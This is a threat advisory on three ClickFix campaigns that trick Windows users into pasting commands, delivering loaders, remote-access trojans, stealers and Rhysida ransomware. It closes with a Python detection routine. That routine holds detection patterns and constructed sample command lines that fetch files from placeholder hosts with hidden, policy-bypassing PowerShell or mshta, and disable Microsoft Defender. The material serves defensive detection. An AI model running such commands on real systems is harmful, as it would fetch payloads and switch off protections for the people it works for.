TA2026176
Threat Advisory • Attack Report
Three separate ClickFix campaigns trick Windows users into pasting malicious commands, each delivering a distinct loader — Potemkin, BabaDeda Loader, and Lorem Ipsum Loader — that culminate in RMMProject, EtherRAT, DanaBot, SectopRAT, and Rhysida ransomware tied to threat actor Rapid Brigantine.
Section 01
This Attack Report documents three separate ClickFix campaigns, first seen in May 2026, that trick Windows users across the globe into pasting attacker-supplied commands into the system — with each campaign delivering a different loader. The ClickFix lures abuse Google Chrome, Mozilla Firefox, Microsoft Edge, Microsoft Defender, and compromised WordPress sites to reach victims in Education, Financial Services, Architecture, Legal Services, Non-profit, Construction Technology, and Content Publishing.
The Potemkin loader drops the RMMProject RAT alongside EtherRAT, which spread across more than 11 hosts to reach the domain controller. The BabaDeda Loader delivers a .NET stealer plus the DanaBot and SectopRAT stealers. The Lorem Ipsum Loader, tied to the threat actor Rapid Brigantine (a.k.a. Vanilla Tempest, Vice Society, Vice Spider, DEV-0832), installs a backdoor that leads to Oyster, Supper, and MeowBackConn, ending in Rhysida ransomware deployment.
Section 02
All three ClickFix campaigns begin with ClickFix social engineering. Users visiting compromised or malicious websites are shown a fake browser-update, security-update, or CAPTCHA-style prompt instructing them to open a Windows utility, the Run dialog, or Windows Terminal, and paste an attacker-supplied command. In one chain, the pasted command abuses pcalua.exe as a living-off-the-land binary to proxy mshta.exe execution, which fetches a remote HTA that hides its window and silently downloads and installs an MSI.
In another ClickFix chain, a PowerShell command masquerading as a Microsoft Edge security intelligence update downloads a ZIP archive together with a portable, legitimately signed Node.js runtime, then launches an embedded JavaScript dropper with a hidden window and a second hidden PowerShell process with execution policy set to Bypass. A third chain presents a fake verification prompt to run a PowerShell command that stages further components. Delivery infrastructure includes at least five compromised WordPress sites spanning architecture, legal services, non-profit, construction technology, and content publishing, plus a rotating pool of themed fake-update domains. After initial execution, each chain stages a modular, multi-component Loader.
The Potemkin loader had one simple job: to deliver the next piece of malware. After the ClickFix trick installed it through an MSI file, Potemkin found its command server and loaded a tool called RMMProject straight into memory, never saving it to disk. RMMProject is the part that did the real damage — stealing browser passwords and cookies, secretly controlling the screen, and slipping its code into other programs. The attacker also dropped EtherRAT (a backdoor that hides its server address on the blockchain) and set up tunneling tools to move around the network, eventually spreading EtherRAT to more than 11 machines, including the domain controller.
BabaDeda Loader delivered its malware in two different ways. One path installed a backdoor and information stealer that scans the computer, opens a secret connection to the attacker's server, and steals browser cookies, saved passwords, and files when told to. The other path dropped a fake software package that used a trusted program to load malicious code and pulled its real payload out of a hidden file, then launched the DanaBot and SectopRAT stealers in memory.
The Lorem Ipsum chain in this set is operationally tied with high confidence to Rapid Brigantine, a financially motivated group active since at least mid-2022 and known for deploying Rhysida, BlackCat, Zeppelin, and Quantum Locker ransomware. The group is documented using trojanized installers signed through a malware-signing-as-a-service provider, which matches the pipeline behind earlier Lorem Ipsum activity, and the late-May pivot to ClickFix followed directly from the takedown of that certificate supply, leaving an unsigned delivery path as the only viable option.
A separately documented intrusion deployed the Lorem Ipsum Loader alongside MeowBackConn on domain controllers, placing the loader squarely inside the group's established post-exploitation arsenal (Oyster, Supper, MeowBackConn) that culminates in Rhysida deployment. Whether the Lorem Ipsum operators are Rapid Brigantine personnel directly or a closely allied development team feeding tooling into the group's pipeline remains an open intelligence gap, but the operational linkage holds either way.
Section 03
Use Group Policy to disable the Run dialog and the Win+R hotkey, and restrict wt.exe where feasible. Every ClickFix chain in this advisory depends on the user pasting a command into one of these; if the prompt never opens, the attack fails at the first step.
Use AppLocker or Windows Defender Application Control to prevent PowerShell, node.exe, mshta.exe, and pcalua.exe from running scripts or binaries staged in C:\ProgramData, AppData, and Temp directories.
Treat wt.exe or a browser spawning PowerShell download cradles, pcalua.exe proxying mshta.exe, and portable node.exe executing from C:\ProgramData as high-fidelity detections.
Turn on Microsoft Defender tamper protection and raise high-priority alerts on Stop-Service WinDefend, sc.exe config WinDefend start= disabled, bulk Add-MpPreference -ExclusionPath operations, and Set-MpPreference disable toggles.
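As an added example (not the advisory's own tooling), the following Python routine applies the high-fidelity detections above, plus the process relationships described in Section 02, to process-creation events; the event field names (parent_image, image, cmdline) and the sample events are assumed and constructed, and the hidden-window/Bypass rule is a generalization of the PowerShell behaviour described for the Edge-themed chain.

```python
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # assumed field names, Sysmon Event ID 1 / EDR style
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    cmdline: str        # command line of the created process
TERMINAL_OR_BROWSER = {"wt.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Staging directories from the guidance (ProgramData, AppData, Temp) and common download-cradle primitives.
STAGING_DIR = re.compile(r"(^c:\\programdata\\|\\appdata\\|\\temp\\)", re.I)
CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b", re.I)
HIDDEN_BYPASS = re.compile(r"-w(indowstyle)?\s+hidden.*-(ep|executionpolicy)\s+bypass|-(ep|executionpolicy)\s+bypass.*-w(indowstyle)?\s+hidden", re.I)
# Defender tampering commands listed in the guidance above.
DEFENDER_TAMPER = re.compile(
    r"stop-service\s[^|;]*windefend"
    r"|sc(\.exe)?\s+config\s+windefend\s+start=\s*disabled"
    r"|add-mppreference\s[^|;]*-exclusionpath"
    r"|set-mppreference\s[^|;]*-disable\w+", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the high-fidelity rules this event matches."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    hits = []
    if parent in TERMINAL_OR_BROWSER and child in POWERSHELL and CRADLE.search(ev.cmdline):
        hits.append("terminal_or_browser_spawned_download_cradle")
    if parent == "pcalua.exe" and child == "mshta.exe":
        hits.append("pcalua_proxying_mshta")
    if child == "node.exe" and STAGING_DIR.search(ev.image):
        hits.append("portable_node_from_staging_dir")
    if child in POWERSHELL and HIDDEN_BYPASS.search(ev.cmdline):
        hits.append("hidden_bypass_powershell")
    if DEFENDER_TAMPER.search(ev.cmdline):
        hits.append("defender_tamper")
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for illustration, not taken from a real host
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", PS,
              'powershell -w hidden -ep bypass -c "iwr https://updates.invalid/u.zip -OutFile $env:TEMP\\u.zip"'),
    ProcEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\mshta.exe", "mshta https://cdn.invalid/h.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\ProgramData\svc\node.exe", "node.exe Update.js"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe", "sc config WinDefend start= disabled"),
]

def triage(events=SAMPLE_EVENTS) -> dict[int, list[str]]:
    # Map event index -> matched rule names, omitting events with no hits.
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Feed real events in by constructing ProcEvent records from your telemetry; an empty result for an event means none of the advisory's high-fidelity patterns matched.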
Section 04